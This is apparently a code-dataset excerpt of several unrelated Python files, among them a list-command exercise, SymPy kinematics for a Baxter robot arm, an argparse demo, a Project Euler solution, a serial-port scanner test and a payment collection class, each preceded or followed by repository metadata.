from sys import stdin import re """ The first line contains an integer,N , denoting the number of commands. Each line of the subsequent lines contains one of the commands: insert i e: Insert integer at position . print: Print the list. remove e: Delete the first occurrence of integer . append e: Insert integer at the end of the list. sort: Sort the list. pop: Pop the last element from the list. reverse: Reverse the list. """ def input_to_list(userinput): return re.sub("[^\w]", " ", userinput).split() if __name__ == '__main__': N = int(input()) list = [] for i in range(0,N): userinput = stdin.readline() wordList = input_to_list(userinput) if "insert" == wordList[0]: list.insert(int(wordList[1]),int(wordList[2])) elif "print" in userinput: print(list) elif "remove" in userinput: list.remove(int(wordList[1])) elif "append" in userinput: list.append(int(wordList[1])) elif "sort" in userinput: list.sort() elif "pop" in userinput: list.pop() elif "reverse" in userinput: list.reverse()
30.717949
71
0.605175
3fcb65dba04aa41adca62639fb1dc876d15cd06f
19,338
py
Python
misc/sympy_play/baxter_kinema_sympy.py
YoshimitsuMatsutaIe/hoge_flow_test
22e2e2ce043a3107bd06449f6f9958641293e414
[ "MIT" ]
null
null
null
misc/sympy_play/baxter_kinema_sympy.py
YoshimitsuMatsutaIe/hoge_flow_test
22e2e2ce043a3107bd06449f6f9958641293e414
[ "MIT" ]
null
null
null
misc/sympy_play/baxter_kinema_sympy.py
YoshimitsuMatsutaIe/hoge_flow_test
22e2e2ce043a3107bd06449f6f9958641293e414
[ "MIT" ]
null
null
null
"""baxterロボの同時変換行列などをsympyで式展開し整理 ・左腕のみ """ import sympy as sy import math from sympy.printing.pycode import pycode t_independent = False L, h, H = sy.symbols("L, h, H") L0, L1, L2, L3, L4, L5, L6 = sy.symbols("L0, L1, L2, L3, L4, L5, L6") if t_independent: q1, q2, q3, q4, q5, q6, q7 = sy.symbols("q1, q2, q3, q4, q5, q6, q7") c0 = sy.cos(sy.pi / 4) s0 = sy.sin(sy.pi / 4) c1 = sy.cos(q1) s1 = sy.sin(q1) c2 = sy.cos(q2) s2 = sy.sin(q2) c3 = sy.cos(q3) s3 = sy.sin(q3) c4 = sy.cos(q4) s4 = sy.sin(q4) c5 = sy.cos(q5) s5 = sy.sin(q5) c6 = sy.cos(q6) s6 = sy.sin(q6) c7 = sy.cos(q7) s7 = sy.sin(q7) # ジョイント角度ベクトル q = sy.Matrix([[q1, q2, q3, q4, q5, q6, q7]]).T if not t_independent: ### qを時間の関数にしたいとき ### t = sy.Symbol("t") c0 = sy.cos(sy.pi / 4) s0 = sy.sin(sy.pi / 4) q1 = sy.Function("q1") q2 = sy.Function("q2") q3 = sy.Function("q3") q4 = sy.Function("q4") q5 = sy.Function("q5") q6 = sy.Function("q6") q7 = sy.Function("q7") c1 = sy.cos(q1(t)) s1 = sy.sin(q1(t)) c2 = sy.cos(q2(t)) s2 = sy.sin(q2(t)) c3 = sy.cos(q3(t)) s3 = sy.sin(q3(t)) c4 = sy.cos(q4(t)) s4 = sy.sin(q4(t)) c5 = sy.cos(q5(t)) s5 = sy.sin(q5(t)) c6 = sy.cos(q6(t)) s6 = sy.sin(q6(t)) c7 = sy.cos(q7(t)) s7 = sy.sin(q7(t)) # ジョイント角度ベクトル q = sy.Matrix([[q1(t), q2(t), q3(t), q4(t), q5(t), q6(t), q7(t)]]).T # 同時変換行列 # 直書き # T_Wo_BL = sy.Matrix([[math.sqrt(2) / 2, math.sqrt(2) / 2, 0, L], # [-math.sqrt(2) / 2, math.sqrt(2) / 2, 0, -h], # [0, 0, 1, H], # [0, 0, 0, 1]]) # 直書きじゃない T_Wo_BL = sy.Matrix([[c0, s0, 0, L], [-s0, c0, 0, -h], [0, 0, 1, H], [0, 0, 0, 1]]) T_BL_0 = sy.Matrix([[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, L0], [0, 0, 0, 1]]) T_0_1 = sy.Matrix([[c1, -s1, 0, 0], [s1, c1, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]]) T_1_2 = sy.Matrix([[-s2, -c2, 0, L1], [0, 0, 1, 0], [-c2, s2, 0, 0], [0, 0, 0, 1]]) T_2_3 = sy.Matrix([[c3, -s3, 0, 0], [0, 0, -1, -L2], [s3, c3, 0, 0], [0, 0, 0, 1]]) T_3_4 = sy.Matrix([[c4, -s4, 0, L3], [0, 0, 1, 0], [-s4, -c4, 0, 0], [0, 0, 0, 1]]) T_4_5 = sy.Matrix([[c5, -s5, 0, 0], [0, 0, -1, -L4], [s5, c5, 0, 0], [0, 0, 0, 1]]) T_5_6 = sy.Matrix([[c6, -s6, 0, L5], [0, 0, 1, 0], [-s6, -c6, 0, 0], [0, 0, 0, 1]]) T_6_7 = sy.Matrix([[c7, -s7, 0, 0], [0, 0, -1, 0], [s7, c7, 0, 0], [0, 0, 0, 1]]) T_7_GL = sy.Matrix([[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, L6], [0, 0, 0, 1]]) T_0_7 = T_0_1 * T_1_2 * T_2_3 * T_3_4 * T_4_5 * T_5_6 * T_6_7 T_0_6 = T_0_1 * T_1_2 * T_2_3 * T_3_4 * T_4_5 * T_5_6 T_0_5 = T_0_1 * T_1_2 * T_2_3 * T_3_4 * T_4_5 T_0_4 = T_0_1 * T_1_2 * T_2_3 * T_3_4 T_0_3 = T_0_1 * T_1_2 * T_2_3 T_0_2 = T_0_1 * T_1_2 ## 正しい T_Wo_BL = T_Wo_BL T_Wo_0 = T_Wo_BL * T_BL_0 T_Wo_1 = T_Wo_BL * T_BL_0 * T_0_1 T_Wo_2 = T_Wo_BL * T_BL_0 * T_0_2 T_Wo_3 = T_Wo_BL * T_BL_0 * T_0_3 T_Wo_4 = T_Wo_BL * T_BL_0 * T_0_4 T_Wo_5 = T_Wo_BL * T_BL_0 * T_0_5 T_Wo_6 = T_Wo_BL * T_BL_0 * T_0_6 T_Wo_7 = T_Wo_BL * T_BL_0 * T_0_7 T_Wo_GL = T_Wo_BL * T_BL_0 * T_0_7 * T_7_GL T_Wo_i_ = [T_Wo_BL, T_Wo_0, T_Wo_1, T_Wo_2, T_Wo_3, T_Wo_4, T_Wo_5, T_Wo_6, T_Wo_7, T_Wo_GL] T_Wo_i = [sy.simplify(T) for T in T_Wo_i_] ### ヤコビ行列を計算 ### jacobi_alpha_x = [] jacobi_alpha_y = [] jacobi_alpha_z = [] jacobi_origin = [] for T in T_Wo_i: Jax = T[0:3, 0:1].jacobian(q) Jay = T[0:3, 1:2].jacobian(q) Jaz = T[0:3, 2:3].jacobian(q) Jo = T[0:3, 3:4].jacobian(q) jacobi_alpha_x.append(sy.simplify(Jax)) jacobi_alpha_y.append(sy.simplify(Jay)) jacobi_alpha_z.append(sy.simplify(Jaz)) jacobi_origin.append(sy.simplify(Jo)) if not t_independent: #qが時間依存のとき djacobi_alpha_x = [] djacobi_alpha_y = [] djacobi_alpha_z = [] djacobi_origin = [] for Jax, Jay, Jaz, Jo in zip(jacobi_alpha_x, jacobi_alpha_y, jacobi_alpha_z, jacobi_origin): dJax = sy.diff(Jax, t) dJay = sy.diff(Jay, t) dJaz = sy.diff(Jaz, t) dJo = sy.diff(Jo, t) dJs = [dJax, dJay, dJaz, dJo] dq1 ,dq2, dq3, dq4, dq5, dq6, dq7 = sy.symbols('dq1 ,dq2, dq3, dq4, dq5, dq6, dq7') for i, dJ in enumerate(dJs): dJs[i] = dJ.subs([ (sy.Derivative(q1(t), t), dq1), (sy.Derivative(q2(t), t), dq2), (sy.Derivative(q3(t), t), dq3), (sy.Derivative(q4(t), t), dq4), (sy.Derivative(q5(t), t), dq5), (sy.Derivative(q6(t), t), dq6), (sy.Derivative(q7(t), t), dq7), ]) djacobi_alpha_x.append(sy.simplify(dJax)) djacobi_alpha_y.append(sy.simplify(dJay)) djacobi_alpha_z.append(sy.simplify(dJaz)) djacobi_origin.append(sy.simplify(dJo)) # txt出力 # f = open('baxter_hoge.txt', 'w') # for i, T in enumerate(T_Wo_i): # s = '\nT' + str(i) + '=' # f.write(s) # f.write(pycode(T)) # for i, j in enumerate(jacobi_alpha_x): # s = '\njax' + str(i) + '=' # f.write(s) # f.write(pycode(j)) # for i, j in enumerate(jacobi_alpha_y): # s = '\njay' + str(i) + '=' # f.write(s) # f.write(pycode(j)) # for i, j in enumerate(jacobi_alpha_z): # s = '\njaz' + str(i) + '=' # f.write(s) # f.write(pycode(j)) # for i, j in enumerate(jacobi_origin): # s = '\njo' + str(i) + '=' # f.write(s) # f.write(pycode(j)) # f.close() f = open('baxter_hoge_dt.txt', 'w') for i, j in enumerate(djacobi_alpha_x): s = '\ndjax' + str(i) + '=' f.write(s) f.write(pycode(j)) for i, j in enumerate(djacobi_alpha_y): s = '\ndjay' + str(i) + '=' f.write(s) f.write(pycode(j)) for i, j in enumerate(djacobi_alpha_z): s = '\ndjaz' + str(i) + '=' f.write(s) f.write(pycode(j)) for i, j in enumerate(djacobi_origin): s = '\ndjo' + str(i) + '=' f.write(s) f.write(pycode(j)) f.close() # # print("r_bar_Wo_BL = ", T_Wo_BL[0:3, 3:4]) # # print("r_bar_Wo_0 = ", T_Wo_0[0:3, 3:4]) # # print("r_bar_Wo_1 = ", T_Wo_1[0:3, 3:4]) # # print("r_bar_Wo_2 = ", T_Wo_2[0:3, 3:4]) # # print("r_bar_Wo_3 = ", T_Wo_3[0:3, 3:4]) # # print("r_bar_Wo_4 = ", T_Wo_4[0:3, 3:4]) # # print("r_bar_Wo_5 = ", T_Wo_5[0:3, 3:4]) # # print("r_bar_Wo_6 = ", T_Wo_6[0:3, 3:4]) # # print("r_bar_Wo_7 = ", T_Wo_7[0:3, 3:4]) # # print("r_bar_Wo_GL = ", T_Wo_GL[0:3, 3:4]) # #print("orig = ", T_Wo_GL[0:1, 3:4]) # #print("simp = ", sy.simplify(T_Wo_GL[0:1, 3:4])) # # 世界座標系から見た局所座標系の原点位置 # r_Wo_BL = T_Wo_BL[0:3, 3:4] # r_Wo_0 = T_Wo_0[0:3, 3:4] # r_Wo_1 = T_Wo_1[0:3, 3:4] # r_Wo_2 = T_Wo_2[0:3, 3:4] # r_Wo_3 = T_Wo_3[0:3, 3:4] # r_Wo_4 = T_Wo_4[0:3, 3:4] # r_Wo_5 = T_Wo_5[0:3, 3:4] # r_Wo_6 = T_Wo_6[0:3, 3:4] # r_Wo_7 = T_Wo_7[0:3, 3:4] # r_Wo_GL = T_Wo_GL[0:3, 3:4] # r_Wo_BL = sy.simplify(r_Wo_BL) # r_Wo_0 = sy.simplify(r_Wo_0) # r_Wo_1 = sy.simplify(r_Wo_1) # r_Wo_2 = sy.simplify(r_Wo_2) # r_Wo_3 = sy.simplify(r_Wo_3) # r_Wo_4 = sy.simplify(r_Wo_4) # r_Wo_5 = sy.simplify(r_Wo_5) # r_Wo_6 = sy.simplify(r_Wo_6) # r_Wo_7 = sy.simplify(r_Wo_7) # r_Wo_GL = sy.simplify(r_Wo_GL) # # print("BL = ", r_Wo_BL) # # print("0 = ", r_Wo_0) # # print("1 = ", r_Wo_1) # # print("2 = ", r_Wo_2) # # print("3 = ", r_Wo_3) # # print("4 = ", r_Wo_4) # # print("5 = ", r_Wo_5) # # print("6 = ", r_Wo_6) # # print("7 = ", r_Wo_7) # # print("GL = ", r_Wo_GL) # jacobi_r_Wo_BL = sy.simplify(r_Wo_BL.jacobian(q)) # jacobi_r_Wo_0 = sy.simplify(r_Wo_0.jacobian(q)) # jacobi_r_Wo_1 = sy.simplify(r_Wo_1.jacobian(q)) # jacobi_r_Wo_2 = sy.simplify(r_Wo_2.jacobian(q)) # jacobi_r_Wo_3 = sy.simplify(r_Wo_3.jacobian(q)) # jacobi_r_Wo_4 = sy.simplify(r_Wo_4.jacobian(q)) # jacobi_r_Wo_5 = sy.simplify(r_Wo_5.jacobian(q)) # jacobi_r_Wo_6 = sy.simplify(r_Wo_6.jacobian(q)) # jacobi_r_Wo_7 = sy.simplify(r_Wo_7.jacobian(q)) # jacobi_r_Wo_GL = sy.simplify(r_Wo_GL.jacobian(q)) # # print("BL = ", jacobi_r_Wo_BL) # # print("0 = ", jacobi_r_Wo_0) # # print("1 = ", jacobi_r_Wo_1) # # print("2 = ", jacobi_r_Wo_2) # # print("3 = ", jacobi_r_Wo_3) # # print("4 = ", jacobi_r_Wo_4) # # print("5 = ", jacobi_r_Wo_5) # # print("6 = ", jacobi_r_Wo_6) # # print("7 = ", jacobi_r_Wo_7) # # print("GL = ", jacobi_r_Wo_GL) # djacobi_BL = sy.diff(jacobi_r_Wo_BL, t) # djacobi_0 = sy.diff(jacobi_r_Wo_0, t) # djacobi_1 = sy.diff(jacobi_r_Wo_1, t) # djacobi_2 = sy.diff(jacobi_r_Wo_2, t) # djacobi_3 = sy.diff(jacobi_r_Wo_3, t) # djacobi_4 = sy.diff(jacobi_r_Wo_4, t) # djacobi_5 = sy.diff(jacobi_r_Wo_5, t) # djacobi_6 = sy.diff(jacobi_r_Wo_6, t) # djacobi_7 = sy.diff(jacobi_r_Wo_7, t) # djacobi_GL = sy.diff(jacobi_r_Wo_GL, t) # # # dqを時間の変数にしたいとき # # dq1 = sy.Function("dq1") # # dq2 = sy.Function("dq2") # # dq3 = sy.Function("dq3") # # dq4 = sy.Function("dq4") # # dq5 = sy.Function("dq5") # # dq6 = sy.Function("dq6") # # dq7 = sy.Function("dq7") # # djacobi_BL = djacobi_BL.subs([(sy.Derivative(q1(t), t), dq1(t)), # # (sy.Derivative(q2(t), t), dq2(t)), # # (sy.Derivative(q3(t), t), dq3(t)), # # (sy.Derivative(q4(t), t), dq4(t)), # # (sy.Derivative(q5(t), t), dq5(t)), # # (sy.Derivative(q6(t), t), dq6(t)), # # (sy.Derivative(q7(t), t), dq7(t)),]) # # djacobi_0 = djacobi_0.subs([(sy.Derivative(q1(t), t), dq1(t)), # # (sy.Derivative(q2(t), t), dq2(t)), # # (sy.Derivative(q3(t), t), dq3(t)), # # (sy.Derivative(q4(t), t), dq4(t)), # # (sy.Derivative(q5(t), t), dq5(t)), # # (sy.Derivative(q6(t), t), dq6(t)), # # (sy.Derivative(q7(t), t), dq7(t)),]) # # djacobi_1 = djacobi_1.subs([(sy.Derivative(q1(t), t), dq1(t)), # # (sy.Derivative(q2(t), t), dq2(t)), # # (sy.Derivative(q3(t), t), dq3(t)), # # (sy.Derivative(q4(t), t), dq4(t)), # # (sy.Derivative(q5(t), t), dq5(t)), # # (sy.Derivative(q6(t), t), dq6(t)), # # (sy.Derivative(q7(t), t), dq7(t)),]) # # djacobi_2 = djacobi_2.subs([(sy.Derivative(q1(t), t), dq1(t)), # # (sy.Derivative(q2(t), t), dq2(t)), # # (sy.Derivative(q3(t), t), dq3(t)), # # (sy.Derivative(q4(t), t), dq4(t)), # # (sy.Derivative(q5(t), t), dq5(t)), # # (sy.Derivative(q6(t), t), dq6(t)), # # (sy.Derivative(q7(t), t), dq7(t)),]) # # djacobi_3 = djacobi_3.subs([(sy.Derivative(q1(t), t), dq1(t)), # # (sy.Derivative(q2(t), t), dq2(t)), # # (sy.Derivative(q3(t), t), dq3(t)), # # (sy.Derivative(q4(t), t), dq4(t)), # # (sy.Derivative(q5(t), t), dq5(t)), # # (sy.Derivative(q6(t), t), dq6(t)), # # (sy.Derivative(q7(t), t), dq7(t)),]) # # djacobi_4 = djacobi_4.subs([(sy.Derivative(q1(t), t), dq1(t)), # # (sy.Derivative(q2(t), t), dq2(t)), # # (sy.Derivative(q3(t), t), dq3(t)), # # (sy.Derivative(q4(t), t), dq4(t)), # # (sy.Derivative(q5(t), t), dq5(t)), # # (sy.Derivative(q6(t), t), dq6(t)), # # (sy.Derivative(q7(t), t), dq7(t)),]) # # djacobi_5 = djacobi_5.subs([(sy.Derivative(q1(t), t), dq1(t)), # # (sy.Derivative(q2(t), t), dq2(t)), # # (sy.Derivative(q3(t), t), dq3(t)), # # (sy.Derivative(q4(t), t), dq4(t)), # # (sy.Derivative(q5(t), t), dq5(t)), # # (sy.Derivative(q6(t), t), dq6(t)), # # (sy.Derivative(q7(t), t), dq7(t)),]) # # djacobi_6 = djacobi_6.subs([(sy.Derivative(q1(t), t), dq1(t)), # # (sy.Derivative(q2(t), t), dq2(t)), # # (sy.Derivative(q3(t), t), dq3(t)), # # (sy.Derivative(q4(t), t), dq4(t)), # # (sy.Derivative(q5(t), t), dq5(t)), # # (sy.Derivative(q6(t), t), dq6(t)), # # (sy.Derivative(q7(t), t), dq7(t)),]) # # djacobi_7 = djacobi_7.subs([(sy.Derivative(q1(t), t), dq1(t)), # # (sy.Derivative(q2(t), t), dq2(t)), # # (sy.Derivative(q3(t), t), dq3(t)), # # (sy.Derivative(q4(t), t), dq4(t)), # # (sy.Derivative(q5(t), t), dq5(t)), # # (sy.Derivative(q6(t), t), dq6(t)), # # (sy.Derivative(q7(t), t), dq7(t)),]) # # djacobi_GL = djacobi_GL.subs([(sy.Derivative(q1(t), t), dq1(t)), # # (sy.Derivative(q2(t), t), dq2(t)), # # (sy.Derivative(q3(t), t), dq3(t)), # # (sy.Derivative(q4(t), t), dq4(t)), # # (sy.Derivative(q5(t), t), dq5(t)), # # (sy.Derivative(q6(t), t), dq6(t)), # # (sy.Derivative(q7(t), t), dq7(t)),]) # # dqを時間に依らないとしたいとき # dq1 ,dq2, dq3, dq4, dq5, dq6, dq7 = sy.symbols('dq1 ,dq2, dq3, dq4, dq5, dq6, dq7') # djacobi_BL = djacobi_BL.subs([(sy.Derivative(q1(t), t), dq1), # (sy.Derivative(q2(t), t), dq2), # (sy.Derivative(q3(t), t), dq3), # (sy.Derivative(q4(t), t), dq4), # (sy.Derivative(q5(t), t), dq5), # (sy.Derivative(q6(t), t), dq6), # (sy.Derivative(q7(t), t), dq7)]) # djacobi_0 = djacobi_0.subs([(sy.Derivative(q1(t), t), dq1), # (sy.Derivative(q2(t), t), dq2), # (sy.Derivative(q3(t), t), dq3), # (sy.Derivative(q4(t), t), dq4), # (sy.Derivative(q5(t), t), dq5), # (sy.Derivative(q6(t), t), dq6), # (sy.Derivative(q7(t), t), dq7),]) # djacobi_1 = djacobi_1.subs([(sy.Derivative(q1(t), t), dq1), # (sy.Derivative(q2(t), t), dq2), # (sy.Derivative(q3(t), t), dq3), # (sy.Derivative(q4(t), t), dq4), # (sy.Derivative(q5(t), t), dq5), # (sy.Derivative(q6(t), t), dq6), # (sy.Derivative(q7(t), t), dq7),]) # djacobi_2 = djacobi_2.subs([(sy.Derivative(q1(t), t), dq1), # (sy.Derivative(q2(t), t), dq2), # (sy.Derivative(q3(t), t), dq3), # (sy.Derivative(q4(t), t), dq4), # (sy.Derivative(q5(t), t), dq5), # (sy.Derivative(q6(t), t), dq6), # (sy.Derivative(q7(t), t), dq7),]) # djacobi_3 = djacobi_3.subs([(sy.Derivative(q1(t), t), dq1), # (sy.Derivative(q2(t), t), dq2), # (sy.Derivative(q3(t), t), dq3), # (sy.Derivative(q4(t), t), dq4), # (sy.Derivative(q5(t), t), dq5), # (sy.Derivative(q6(t), t), dq6), # (sy.Derivative(q7(t), t), dq7),]) # djacobi_4 = djacobi_4.subs([(sy.Derivative(q1(t), t), dq1), # (sy.Derivative(q2(t), t), dq2), # (sy.Derivative(q3(t), t), dq3), # (sy.Derivative(q4(t), t), dq4), # (sy.Derivative(q5(t), t), dq5), # (sy.Derivative(q6(t), t), dq6), # (sy.Derivative(q7(t), t), dq7),]) # djacobi_5 = djacobi_5.subs([(sy.Derivative(q1(t), t), dq1), # (sy.Derivative(q2(t), t), dq2), # (sy.Derivative(q3(t), t), dq3), # (sy.Derivative(q4(t), t), dq4), # (sy.Derivative(q5(t), t), dq5), # (sy.Derivative(q6(t), t), dq6), # (sy.Derivative(q7(t), t), dq7),]) # djacobi_6 = djacobi_6.subs([(sy.Derivative(q1(t), t), dq1), # (sy.Derivative(q2(t), t), dq2), # (sy.Derivative(q3(t), t), dq3), # (sy.Derivative(q4(t), t), dq4), # (sy.Derivative(q5(t), t), dq5), # (sy.Derivative(q6(t), t), dq6), # (sy.Derivative(q7(t), t), dq7),]) # djacobi_7 = djacobi_7.subs([(sy.Derivative(q1(t), t), dq1), # (sy.Derivative(q2(t), t), dq2), # (sy.Derivative(q3(t), t), dq3), # (sy.Derivative(q4(t), t), dq4), # (sy.Derivative(q5(t), t), dq5), # (sy.Derivative(q6(t), t), dq6), # (sy.Derivative(q7(t), t), dq7),]) # djacobi_GL = djacobi_GL.subs([(sy.Derivative(q1(t), t), dq1), # (sy.Derivative(q2(t), t), dq2), # (sy.Derivative(q3(t), t), dq3), # (sy.Derivative(q4(t), t), dq4), # (sy.Derivative(q5(t), t), dq5), # (sy.Derivative(q6(t), t), dq6), # (sy.Derivative(q7(t), t), dq7),]) # djacob_BL = sy.simplify(djacobi_BL) # djacob_0 = sy.simplify(djacobi_0) # djacob_1 = sy.simplify(djacobi_1) # djacob_2 = sy.simplify(djacobi_2) # djacob_3 = sy.simplify(djacobi_3) # djacob_4 = sy.simplify(djacobi_4) # djacob_5 = sy.simplify(djacobi_5) # djacob_6 = sy.simplify(djacobi_6) # djacob_7 = sy.simplify(djacobi_7) # djacob_GL = sy.simplify(djacobi_GL) # print("BL = ", djacobi_BL) # print("0 = ", djacobi_0) # print("1 = ", djacobi_1) # print("2 = ", djacobi_2) # print("3 = ", djacobi_3) # print("4 = ", djacobi_4) # print("5 = ", djacobi_5) # print("6 = ", djacobi_6) # print("7 = ", djacobi_7) # print("GL = ", djacobi_GL)
37.332046
96
0.445134
b797229800135fc011bc9b38749536448f35264c
568
py
Python
Chapter5_Functions/Functions/command_line_arguments2.py
kernbeisser/UdemyPythonPro
000d5e66031bcc22b2d8f115edfbd5ef0e80d5b9
[ "MIT" ]
4
2020-12-28T23:43:35.000Z
2022-01-01T18:34:18.000Z
Chapter5_Functions/Functions/command_line_arguments2.py
kernbeisser/UdemyPythonPro
000d5e66031bcc22b2d8f115edfbd5ef0e80d5b9
[ "MIT" ]
null
null
null
Chapter5_Functions/Functions/command_line_arguments2.py
kernbeisser/UdemyPythonPro
000d5e66031bcc22b2d8f115edfbd5ef0e80d5b9
[ "MIT" ]
9
2020-09-26T19:29:28.000Z
2022-02-07T06:41:00.000Z
import argparse def main(): parser = argparse.ArgumentParser() parser.add_argument('--age', help='Enter your age (int)', type=int, required=True) parser.add_argument('--name', help='Enter your name (str)', type=str, required=True) parser.add_argument('--admin', help='Are your an admin? (bool)', type=bool, required=False) args = parser.parse_args() age = args.age name = args.name is_admin = args.admin print(age, type(age)) print(name, type(name)) print(is_admin, type(is_admin)) if __name__ == '__main__': main()
28.4
95
0.65669
b79b1b889b94911ce0e4e6155e66ab11d9bf5953
665
py
Python
Project Euler Qusetions 61 - 70/Project Euler Question 64.py
Clayton-Threm/Coding-Practice
6671e8a15f9e797338caa617dae45093f4157bc1
[ "MIT" ]
1
2020-02-11T02:03:02.000Z
2020-02-11T02:03:02.000Z
Project Euler Qusetions 61 - 70/Project Euler Question 64.py
Clayton-Threm/Coding-Practice
6671e8a15f9e797338caa617dae45093f4157bc1
[ "MIT" ]
null
null
null
Project Euler Qusetions 61 - 70/Project Euler Question 64.py
Clayton-Threm/Coding-Practice
6671e8a15f9e797338caa617dae45093f4157bc1
[ "MIT" ]
null
null
null
#Project Euler Question 64 #Odd period square roots import math import decimal decimal.getcontext().prec = 299 odd_count = 0 for num in range(1, 10000): repeat_list = [] x = decimal.Decimal(num).sqrt() x1 = decimal.Decimal(math.modf(x)[1]) y = x y1 = x1 if math.modf(y)[0] == 0: continue while True: y = decimal.Decimal((y - y1)) ** decimal.Decimal(-1) y1 = decimal.Decimal(math.modf(y)[1]) y_check = str(y)[:10] if (y_check in repeat_list): break else: repeat_list.append(y_check) if (len(repeat_list) % 2 != 0): odd_count += 1 print (odd_count)
23.75
60
0.574436
b7fab05c9e75761de2933e8475a2d68aab00c447
1,579
py
Python
showcase8/com/aaron/Serial_QR.py
qsunny/python
ace8c3178a9a9619de2b60ca242c2079dd2f825e
[ "MIT" ]
null
null
null
showcase8/com/aaron/Serial_QR.py
qsunny/python
ace8c3178a9a9619de2b60ca242c2079dd2f825e
[ "MIT" ]
2
2021-03-25T22:00:07.000Z
2022-01-20T15:51:48.000Z
showcase8/com/aaron/Serial_QR.py
qsunny/python
ace8c3178a9a9619de2b60ca242c2079dd2f825e
[ "MIT" ]
null
null
null
# -*- codiing:utf-8 -*- """ serial port test 扫描枪测试:D 起动 E 结束 """ __author__="aaron.qiu" import serial import time import string import io if __name__ == "__main__": ser = serial.Serial() ser.port="COM2" ser.baudrate=115200 ser.stopbits=serial.STOPBITS_ONE ser.timeout=0 ser.parity=serial.PARITY_NONE #ser.rtscts=1 print(ser) try: '''ser = serial.Serial('COM2', 115200, timeout=0, parity=serial.PARITY_NONE, rtscts=1)''' ser.open() except Exception as e: print("error open serial port: " + str(e)) exit() if ser.isOpen(): print("ready====") try: #ser.flushInput() # flush input buffer, discarding all its contents #ser.flushOutput() # flush output buffer, aborting current output # and discard all that is in buffer # write data #ser.write(b"D") ser.write(b"D") print("write data: D") time.sleep(0.5) # give the serial port sometime to receive the data numOfLines = 0 while True: time.sleep(3) response = ser.readline() print(bytes.decode(response) ) print("read data: " + str(response, encoding = "utf-8")) numOfLines = numOfLines + 1 if (numOfLines >= 10): break ser.close() except Exception as e1: print("error communicating...: " + str(e1)) else: print("cannot open serial port ")
22.557143
97
0.537682
12cf4624bca1b05e6af0d6fa0ea8fd352dbc7f99
3,119
py
Python
src/onegov/pay/collections/payment.py
politbuero-kampagnen/onegov-cloud
20148bf321b71f617b64376fe7249b2b9b9c4aa9
[ "MIT" ]
null
null
null
src/onegov/pay/collections/payment.py
politbuero-kampagnen/onegov-cloud
20148bf321b71f617b64376fe7249b2b9b9c4aa9
[ "MIT" ]
null
null
null
src/onegov/pay/collections/payment.py
politbuero-kampagnen/onegov-cloud
20148bf321b71f617b64376fe7249b2b9b9c4aa9
[ "MIT" ]
null
null
null
from collections import defaultdict from onegov.core.collection import GenericCollection, Pagination from onegov.pay.models import Payment from sqlalchemy import desc from sqlalchemy.orm import joinedload from sqlalchemy.orm import undefer class PaymentCollection(GenericCollection, Pagination): """ Manages the payment records. To render a list of payments you might want to also consider the :class:`onegov.pay.collection.payable.Paybale` collection, which renders payments by loading the linked records first. """ def __init__(self, session, source='*', page=0, start=None, end=None): super().__init__(session) self.source = source self.page = page self.start = start self.end = end @property def model_class(self): return Payment.get_polymorphic_class(self.source, Payment) def add(self, **kwargs): if self.source != '*': kwargs.setdefault('source', self.source) return super().add(**kwargs) def __eq__(self, other): return all(( self.source == other.source, self.page == other.page, self.start == other.start, self.end == other.end )) def subset(self): q = self.query().order_by(desc(Payment.created)) if self.start: q = q.filter(self.start <= Payment.created) if self.end: q = q.filter(Payment.created <= self.end) q = q.options(joinedload(Payment.provider)) q = q.options(undefer(Payment.created)) return q @property def page_index(self): return self.page def page_by_index(self, index): return self.__class__(self.session, self.source, index) def payment_links_for(self, items): """ A more efficient way of loading all links of the given batch (compared to loading payment.links one by one). """ payment_links = defaultdict(list) for link in Payment.registered_links.values(): targets = self.session.query( getattr(link.table.columns, link.key) ).filter( link.table.columns.payment_id.in_(tuple( p.id for p in items )) ) q = self.session.query(link.cls) q = q.filter(link.cls.id.in_(targets.subquery())) q = q.options(joinedload(link.class_attribute)) for record in q: payments = getattr(record, link.attribute) try: for payment in payments: payment_links[payment.id].append(record) except TypeError: payment_links[payments.id].append(record) return payment_links def payment_links_by_subset(self, subset=None): subset = subset or self.subset() return self.payment_links_for(subset) def payment_links_by_batch(self, batch=None): batch = batch or self.batch if not batch: return None return self.payment_links_for(batch)
29.990385
76
0.603399